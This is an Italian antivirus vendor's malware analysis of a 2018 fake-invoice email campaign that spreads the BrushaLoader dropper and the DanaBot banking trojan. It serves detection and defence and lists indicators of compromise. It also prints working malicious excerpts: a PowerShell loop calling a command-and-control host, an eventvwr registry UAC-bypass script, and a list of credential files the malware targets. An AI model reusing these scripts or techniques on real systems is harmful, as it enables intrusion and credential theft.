TG Soft Security Software Specialist - Vir.IT eXplorer: AntiVirus-AntiSpyware-AntiMalware-AntiRansomware
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

ICSA Lab ICSA Lab

Vir.IT eXplorer PRO supera il test internazionale VB100 2018-08

AMTSO

OpsWat



EICAR Membro SERIT - Security Research in ITaly

18/09/2018 09:41:44 - Campagna MalSpam di finte FATTURE veicola il dropper BrushaLoader

      
 
 

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una mail della campagna che diffonde il malware Trojan Dropper BrushaLoader  in data  18 Settembre 2018

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio.
Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

INDICE

 

Falsa Mail "fattura 189178844" diffonde Trojan Dropper BrushaLoader

Nome: Downloader BrushaLoader
Famiglia malware
: Dropper
VirIT: Trojan.VBS.Dropper.BN

Descrizione
:
La mail è stata rilevata nella mattina del 18 Settembre 2018.
Ssono state rilevate 2 varianti di oggetto della mail: fattura *numero casuale* oppure fatture *numero casuale*.
Il file .rar allegato rimane sempre lo stesso indipendentemente dall'oggetto della mail.

Esempio di email analizzata:

Oggettofattura 189178844

 immagine_1
 
fattura 189178844 - Mozilla Thunderbird
Da:                         
Oggetto: fattura 189178844
A:                           
Buongiorno,
 

Ti sto mandando la fattura in allegato
Grazie per aver utilizzato i nostri servizi e ti invitiamo di nuovo.


 



[Ant (REDACTED)]

[GRAFICHE (REDACTED)]

 
1 allegato: Fattura1891861.rar
 

Torna ad inizio pagina

Come si diffonde:
La mail informa l'utente dell'invio di una fattura per l'utilizzo di alcuni servizi (senza specificare ne quali ne quando).

La mail all'interno contiene un allegato .rar
  • Nome File: Fattura1891861.rar  
  • Dimensione: 1015 byte
  • Md5: 395AE966BC124A9AAC90037A6A9E6621                                                  

Il file .rar contiene a sua volta il dropper in formato Script VBS:
 

  • Nome File: Fattura1891861.vbs  
  • Dimensione: 2.280 byte
  • Md5: 907306BC998F4B98BB05EB2EC40E89ED

 Una volta eseguito il file VBS verranno effettuati dei tentativi di connessione a questi URL:
 

  • https://www[.]dencedence[.]denceasdq/12/3232
  • http://proservesmail[.]science/api[.]php?faxid=757010617&opt=21665550759&sfree
  • http://192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550761&sfree
La connessione viene effettuata con succeso all'indirizzo http://192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550761&sfree e viene quindi scaricato il file api[1].php che contiene il seguente script powershell:

set Fh741816 = CreateObject("shell.application")
Fh741816.ShellExecute "powershell", "-EncodedCommand " + Chr(34) +
"SQBFAFgAIAAoAE4
[...]
ByAHQAJwApADsA" + Chr(34) + "", "", "open", 0
set Fh741816 = nothing

Che viene eseguito dal seguente comando:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
-EncodedCommand "SQBFAFgAIAAo [..] JwApADsA"


Viene quindi scaricato il file: https://laredoute[.]space:443/chkesosod/downs/qwert che contiene il seguente comando powershell:

powershell.exe -encodedCommand
"IAAgACAAIAB3AGgAaQBs
[...]
IAAgACAAIAB9AA==

Eseguendo quindi il comando tramite powershell come visto sopra.

Decodificando il comando possiamo vederne il codice:

while (1 - eq 1) {
    try {
        $ErrorActionPreference = 'Continue';
        $mcUdDu132 = New - Object Net.Sockets.TCPClient("laredoute[.]space", 80);
        $jtJ60784 = ($mcUdDu132.GetStream());
        [byte[]] $cw241 = 0. .255 | % {
            0
        };
        while (($i = $jtJ60784.Read($cw241, 0, $cw241.Length)) - ne 0) {
            [...]
            $jtJ60784.Flush()
        }
    } catch {
        Start - Sleep - s 10;
        if ($mcUdDu132.Connected) {
            $mcUdDu132.Close();
        }
    }
}

Questo script ha lo scopo di comunicare informazioni rispondendo a specifiche richieste dal server di C&C (laredoute[.]space) di seguito ne vediamo alcuni esempi:

Comando Ricevuto: "6f7074696f6e73winos"; $winos = [environment]::OSVersion.Version; $winos.Major;$winos.Minor;$winos.Build;$winos.Revision;
Risposta del client:  6f7074696f6e73winos 6 1 7601 65536

Comando Ricevuto: "6f7074696f6e73username";[Environment]::UserName;
Risposta del client: 6f7074696f6e73username [utente del PC REDACTED]

Questo permette di comunicare varie informazioni sul PC/SERVER. Viene utilizzato anche il comando IPCONFIG.EXE per recuperare l'ip della macchina.

Successivamente si ricollega al sito 192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550799&sfree scaricando un nuovo VBScript che contiene un file eseguibile della famiglia DanaBot codificato che verrà salvato previa decodifica sulla cartella temporanea dell'utente (%temp%) con nome casuale, nel nostro caso "TnGzH" e successivamente rinominato in TnGzH.exe attraverso un ulteriore script e viene eseguito.

  • Nome File: TnGzH.exe
  • VirIT: Trojan.Win32.DanaBot.AUY
  • Dimensione: 346.112 byte
  • Md5: 4252CC51968F7BB250D5A1D7E5AB128E

Il file quando eseguito estrae un file in temp chiamato "TnGzH.dll" ed eseguito con il seguente comando: C:\Windows\system32\rundll32.exe C:\Users\<UTENTE>\AppData\Local\Temp\TnGzH.dll,f1 C:\Users\<UTENTE>\AppData\Local\Temp\TnGzH.exe
  • Nome File: TnGzH.dll
  • VirIT: Trojan.Win32.DanaBot.AUY
  • Dimensione: 143.360 byte
  • Md5: 4F412CEE07D26A6D311775B3941AE53A
Tenta quindi di collegarsi ai seguenti IP:
  • 198[.]7[.]141[.]21
  • 249[.]55[.]145[.]209
  • 161[.]40[.]127[.]191
  • 254[.]175[.]147[.]60
  • 45[.]77[.]231[.]138
Dall' indirizzo 45[.]77[.]231[.]138 scarica una ulteriore DLL con nome casuale nel nostro caso:

  • Nome File: 10055932.dll
  • VirIT: Trojan.Win32.DanaBot.AUY
  • Dimensione: 1.636.880 byte
  • Md5: F826534A5C23C75B1BD19F1EA7E60726
Il file VBS "Fattura1891861.vbs" continua a collegarsi alla pagina 192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550854&sfree e provvede a scaricare un ulteriore script visibile sotto:

Set WSobj = CreateObject("WScript.Shell")
Set objFsos = CreateObject("Scripting.FileSystemObject") 
Set tempfolder = objFsos.GetSpecialFolder(2)
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", tempfolder + "\TnGzH.exe", "REG_SZ"
WSobj.Run ("%windir%\System32\eventvwr.exe")
WScript.Sleep 2000
WSobj.Run ("%windir%\system32\compmgmt.msc /s")
Set WSobj = Nothing
Set objFsos = Nothing

In questo modo l'esecuzione di compmgmt.msc comporta a sua volta l'esecuzione del malware %temp%\TnGzH.exe e subito dopo viene scaricato un nuovo script che provvede a cancellare le chiavi precedentemente create:

Set WSobj = CreateObject("WScript.Shell")
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
Set WSobj = Nothing

Il VBS continua a collegarsi all'indirizzo 192[.]3[.]204[.]229/api[.]php?faxid=757010617&opt=21665550858&sfree e scarica un ulteriore script:

Dim objShell, objFso, tempfolder
Set objShell = CreateObject("Shell.Application")
Set objFso= CreateObject("Scripting.FileSystemObject") 
Set tempfolder = objFso.GetSpecialFolder(2)
objShell.ShellExecute "powershell", "powershell -EncodedCommand JABwAGEAdABoACAA
[...]
QB0AGgAKQA7AA==", "", "runas", 0
Set objShell = Nothing
Set objFso = Nothing
Set tempfolder = Nothing

Viene eseguito lo script tramite PowerShell che si connette nuovamente all'IP 192[.]3[.]204[.]229 chiamando la pagina fax[.]php?id=admin che scarica nuovamente il file TnGzH.exe nella cartella temp dell'utente e lo esegue con RUNDLL32.EXE come visto sopra.

Quanto visto sopra sono i 3 metodi utilizzati per infettare il PC/SERVER e la comunicazione al C&C come si può vedere dal grafico sotto dei processi:

La persistenza del malware viene basata su un servizio che carica la DLL del DanaBot C:\ProgramData\100559DC\10055932[.]dll

Nome Servizio:
100559DC
Descrizione: Monitors system events and notifies subscribers to COM+ Event System of these events.
Percorso: C:\Windows\system32\svchost.exe -k LocalService (C:\ProgramData\100559DC\10055932.DLL)

La DLL del DanaBot C:\ProgramData\100559DC\10055932[.]dll si connette ai seguenti indirizzi IP:
  • 13[.]38[.]191[.]32
  • 250[.]217[.]157[.]172
  • 237[.]59[.]8[.]12
  • 176[.]35[.]198[.]67
  • 117[.]61[.]222[.]26
  • 240[.]252[.]18[.]141
  • 2[.]52[.]194[.]160
  • 203[.]123[.]241[.]151
  • 95[.]179[.]151[.]252
  • 45[.]77[.]231[.]138
Solamente gli ultimi 2 indirizzi IP (95[.]179[.]151[.]252 e 45[.]77[.]231[.]138) sono attivi come server C&C. Dai server di C&C vengono inviati i comandi per l'esfiltrazione dei dati che verranno impartiti attraverso l'esecuzione della DLL stessa attraverso RUNDLL32.EXE passandogli come parametro il numero/nome della funzione:
  • C:\Windows\system32\RUNDLL32.EXE C:\PROGRA~2\100559DC\10055932.DLL,f5 E0FBBC92DB9927BFC474A64DF4F9C22F
  • C:\Windows\system32\RUNDLL32.EXE C:\PROGRA~2\100559DC\10055932.DLL,f4 CCE32C822138600E282D482BFC595B3D
Negli esempi sopra vengono eseguite le funzioni f5 e f4 con i loro relativi parametri.

Inoltre è stata chiamata la funzione f7 del DanaBot con lo scopo di generare la chiave RSA: C:\ProgramData\Microsoft\Crypto\RSA\\MachineKeys \c8a2ffdb7c0004909a9da2bb05dfd4b6_c69802bc-d96a-48da-abe6-0e5e19ac8613

Lo scopo del malware è quello di esfiltrare varie credenziali di accesso, file di configurazione di software FTP/VPN, cookies, cache ne riportiamo alcuni esempi:
  • C:\Users\[UTENTE]\AppData\Roaming\Dialer Queen\*.ini
  • C:\Users\[UTENTE]\AppData\Roaming\CPN\Cake\*.store
  • C:\Users\[UTENTE]\AppData\Roaming\Flexiblesoft\Dialer Lite\*.set
  • C:\Users\[UTENTE]\AppData\Local\Miranda\\*.*
  • C:\Users\[UTENTE]\Documents\*.rdp
  • C:\Program Files\Cisco Systems\VPN Client\Profiles\*.pcf
  • C:\Users\[UTENTE]\AppData\Roaming\Mozilla\Firefox\\Profiles\*.*
  • C:\Users\[UTENTE]\AppData\Roaming\Opera\*.*
  • C:\Users\[UTENTE]\AppData\Local\Microsoft\Windows Live Mail\\*.*
  • C:\Users\[UTENTE]\AppData\Local\Microsoft\Windows Mail\\*.*
  • C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
  • C:\Program Files\Common Files\Ipswitch\WS_FTP\*.*
  • C:\ProgramData\Ipswitch\WS_FTP Home\Sites\*.*


IOC

MD5:
395AE966BC124A9AAC90037A6A9E6621
907306BC998F4B98BB05EB2EC40E89ED
4252CC51968F7BB250D5A1D7E5AB128E
4F412CEE07D26A6D311775B3941AE53A
F826534A5C23C75B1BD19F1EA7E60726
EEEF3E81461AED006578D813D0AF0B72
952BF80D1665421C8748519141C061FF
F452F04C438DEE8101F13ADC7416BA92
D7DAC08706CCBDA8E2A0097A92169F02
2663E2D5174D8A5673F8569404AE9C00
3375DF8A836D4BA7F6CC082654A4918F
884455B9E73292FCD35253BF10DEDE5B

URL:
www[.]dencedence[.]denceasdq
proservesmail[.]science
192[.]3[.]204[.]229
laredoute[.]space  (C&C)
13[.]38[.]191[.]32
250[.]217[.]157[.]172
237[.]59[.]8[.]12
176[.]35[.]198[.]67
117[.]61[.]222[.]26
240[.]252[.]18[.]141
2[.]52[.]194[.]160
203[.]123[.]241[.]151
95[.]179[.]151[.]252
(C&C)
45[.]77[.]231[.]138
(C&C)


Torna ad inizio pagina

 


Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker,  il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui  la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.  


Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:
  1. qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
  2. salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).
Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.
Torna ad inizio pagina
 


Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:
  • liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
  • interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
  • identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
  • grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
  • Procedi al  download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.
 


C.R.A.M.

Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina





Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283